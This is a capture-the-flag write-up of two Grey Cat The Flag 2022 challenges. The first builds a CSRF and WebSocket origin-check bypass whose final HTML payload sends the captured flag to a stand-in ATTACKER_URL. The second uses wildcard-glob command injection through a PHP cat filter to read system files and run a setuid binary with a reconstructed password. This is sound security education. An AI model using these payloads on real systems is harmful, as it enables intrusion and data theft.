Grey Cat The Flag 2022

Organized by NUS Greyhats in collaboration with National Cybersecurity R&D Labs from Singapore.

Qualifiers

I played the qualifiers while on holiday, so I was only able to join in for 1-2 hours every night. Nonetheless, my team did pretty well, finishing 3rd among Singapore teams and 4th overall.

Here are the challenges I solved.

Challenge

Quotes

Feeling lost? Why don't you come and get quotes from the wise?
MD5 (quotes.tar.gz) = 3ba36e72cb0ee2186745673475de8cf7
复读机

This was a simple client-side web exploitation challenge. From the /share endpoint we can submit a URL for the admin bot to visit.

@app.route('/share', methods=['GET','POST'])
def share():
    if request.method == "GET":
        return render_template("share.html")
    else:
        if not request.form.get('url'):
            return "yes?"
        else:
            thread_a = Bot(request.form.get('url'))
            thread_a.start()
            return "nice quote, thanks for sharing!"

Let's take a look at the actual functionality of the web app! The flag can be found in the /quote WebSockets endpoint - as long as we satisfy the following conditions:

The WebSocket client's origin must start with http://localhost
The client must have the correct auth cookie

@sockets.route('/quote')
def echo_socket(ws):
    print('/quote', flush=True)
    while not ws.closed:
        try:
            try:
                cookie = dict(i.split('=') for i in ws.handler.headers.get('Cookie').split('; '))
            except:
                cookie = {}

            # only admin from localhost can get the GreyCat's quote
            if ws.origin.startswith("http://localhost") and cookie.get('auth') == auth_token:
                ws.send(f"{os.environ['flag']}")
            else:
                ws.send(f"{quotes[random.randint(0,len(quotes))]}")
            ws.close()
        except Exception as e:
            print('error:',e, flush=True)

The correct auth cookie is set at the /auth endpoint when the request is made locally by the admin bot.

# authenticate localhost only
@app.route('/auth')
def auth():
    if request.remote_addr == "127.0.0.1":
        resp = make_response("authenticated")
        # I heard httponly defend against XSS(what is that?)
        resp.set_cookie("auth", auth_token, httponly=True)
    else:
        resp = make_response("unauthenticated")
    return resp

It is trivial to perform a GET-based CSRF through a top-level navigation to set the authentication cookie for the victim. We subsequently "sleep" for 1 second before continuing with the rest of the exploit to ensure that the nagivation was completed and the cookie was set.

const sleep = async (ms) => {
    return new Promise(resolve => setTimeout(resolve, ms));
}

window.open("http://localhost:7070/auth");

await sleep(1000);

Bypassing the Origin Check

<scheme>://<hostname>:<port>

Unless we find a browser zero-day that allows a malicious webpage to spoof Origin headers (this would be quite interesting), there is no way around our exploit page's origin needing to start with http://localhost.

But is that sufficient validation to ensure the WebSocket connection came from a page hosted on the localhost? Nope! We could simply use a domain starting with localhost, e.g. localhost.zeyu2001.com.

Final Payload

The following page needs to be hosted on a domain starting with localhost and submitted to /share.

<html>
    <body>
        <script>
            (async () => {

                const sleep = async (ms) => {
                    return new Promise(resolve => setTimeout(resolve, ms));
                }

                window.open("http://localhost:7070/auth");

                await sleep(1000);

                const ws = new WebSocket('ws://localhost:7070/quote');

                ws.onopen = function open() {
                    ws.send('getquote');
                };

                ws.onmessage = function incoming(data) {
                    fetch("http://ATTACKER_URL/?quote=" + data.data)
                };
            })();
        </script>
    </body>
</html>

Shero

We like cat, so don't abuse it please =(
复读机

The premise of this challenge was quite simple. We are given the following source code, with the goal of finding the flag somewhere on the server.

<?php
    $file = $_GET['f'];
    if (!$file) highlight_file(__FILE__);

    if (preg_match('#[^.cat!? /\|\-\[\]\(\)\$]#', $file)) {
        die("cat only");
    }

    if (isset($file)) {
        system("cat " . $file);
    }
?>

By supplying a ?f= GET request parameter, we can run commands on the server. One problem though - the regex filter is more than a little restrictive.

The list of allowed characters are as follows:

Reading Arbitrary Files

For example, using cat /?tc/???t?, we could read the /etc/hosts file.

Using cat /???????? yielded this very interesting-looking binary. At first glance, it contained the string readflag.c, so we could guess that this binary is probably called readflag and it runs with elevated permissions to read a flag file somewhere (so that we need RCE instead of simple file reading)

If we download the binary and open it up in a decompiler, we would see that we need to pass the string sRPd45w_0 as an argument (argv[1]) in order to read the flag. This was the result of rearranging the letters in the string P4s5_w0Rd.

Running Arbitrary Commands

Since the | character is allowed, we are able to use piping to terminate the cat command and start a new command. For example, using ?f=| /??a???a? will translate to cat | /??a???a?, which runs the /readflag binary.

Passing the Argument

Now comes the torturous part. How do we get arbitrary characters to use as the password?

When reading the binary previously, we could see that the string P4s5_w0Rd is in the binary. If we could run strings on the binary, somehow extract only the password string, and rearrange the letters, we could use command substitution to pass the correct password as an argument.

We could run /usr/bin/strings /readflag using /???/???/?t????? /??a???a?

Luckily enough, many useful regex characters are allowed - in particular, ., [ and ] are very useful. This allowed me to construct a regex that leaves only the password string.

Using /???/???/?t????? /???????? | /???/a?t???a?????/?a?? /[.-t][.-a][.-t][.-a][!-a].[.-a][.-t][c-t]/, we can get the P4s5_w0Rd string!

At this point, we could try passing in the string as an argument to /readflag using $(), but this will yield "Wrong Password!".

Rearranging the Letters

By using /???/???/c?t -cX, we will get the character of the string at index X.

But how do we make the exit code non-zero? We just need to place an extra bogus command in front of it: (a || /???/???/c?t -c$(($? / $?))).

Here's the script to generate the payload required to reconstruct the password string.

original = "P4s5_w0Rd"
target = "sRPd45w_0"

final = ''
for char in target:
    idx = original.index(char)

    num = "$? / $?"

    for i in range(idx):
        num += "-- $? / $?"

    final += f"$(/???/???/?t????? /???????? | /???/a?t???a?????/?a?? /[.-t][.-a][.-t][.-a][!-a].[.-a][.-t][c-t]/ | (a || /???/???/c?t -c$(({num}))))"

print(final)